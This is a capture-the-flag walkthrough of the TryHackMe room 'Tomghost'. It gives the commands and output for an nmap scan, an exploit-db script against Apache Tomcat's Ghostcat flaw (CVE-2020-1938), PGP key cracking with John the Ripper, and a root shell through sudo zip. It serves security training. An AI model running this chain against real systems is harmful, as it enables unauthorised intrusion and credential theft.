Tomghost
In this post, we will look into the room “Tomghost” from TryHackMe, which can be found on https://tryhackme.com
First step is to enumerate the machine. A simple nmap scan will do it:
nmap -Pn -sV --script vulners <IP>
Nmap scan report for 10.10.170.7
Host is up (0.055s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
53/tcp open tcpwrapped
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8080/tcp open http Apache Tomcat 9.0.30
| vulners:
| cpe:/a:apache:tomcat:9.0.30:
|_ CVE-2020-1938 7.5 https://vulners.com/cve/CVE-2020-1938
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelStep 2 – Web Exploitation
From the following Nmap scan, we can see that the box is vulnerable to CVE-2020-1938. Simple research revealed that this version of Apache Tomcat appears to be vulnerable to File Reading/Inclusion. The following exploit can allow us to read sensitive information, such as login credentials.
Article: nvd.nist.gov/vuln/detail/CVE-2020-1938
Exploit: exploit-db.com/exploits/48143
Download the exploit and run it using
python 48143.py <IP>You should see a similar output:
Getting resource at ajp13://<IP>/asdf
----------------------------
<?xml version="1.0" encoding="UTF-8"?>
<!--
Licensed to the Apache Software Foundation (ASF) under one or more
contributor license agreements. See the NOTICE file distributed with
this work for additional information regarding copyright ownership.
The ASF licenses this file to You under the Apache License, Version 2.0
(the "License"); you may not use this file except in compliance with
the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
-->
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee
http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
version="4.0"
metadata-complete="true">
<display-name>Welcome to Tomcat</display-name>
<description>
Welcome to GhostCat
[USERNAME:PASSWORD]
</description>
</web-app>You should see the credentials at the end of the output.
Step 3 – User.txt
Use the following credentials to log into the machine via ssh.
After that, you can immediately get user.txt by browsing to /home and visiting another user’s directory.
Step 4 – Horizontal privilege escalation
Go back to the initial user’s home folder and take a look at what we got there. We can see that there are exactly 2 files: credential.pgp and tryhackme.asc. As we can easily guess, those files will reveal us some credentials (most likely for the second user).
A simple google search on PGP cracking led me to this article. This small guide tells us to crack the .asc file with john the ripper and then use it to open up the PGP.
Let’s first convert the .asc file into a suitable format by running:
gpg2john tryhackme.asc > hashThen, what we need to do is simply run a rockyou-powered cracking process on the hash file:
john hash --wordlist=/usr/share/wordlists/rockyou.txtA password is going to be revealed in a couple of seconds and we can finally use it to open up the .pgp file. Run the following command and enter the password:
gpg --import tryhackme.ascYou can now easily open the PGP file after importing the key.
gpg --decrypt credential.pgpBingo! We got the credentials. Now let’s ssh into the box and enumerate there.
Step 5 – Root
sudo -l reveals that we can run /usr/bin/zip as sudo. A given configuration is relatively famous and is covered by GTFOBins.
Link: https://gtfobins.github.io/gtfobins/zip/#sudo
Let’s follow the guide from GTFO and get the root shell!
Done! We now have root access and can finally read the /root/root.txt.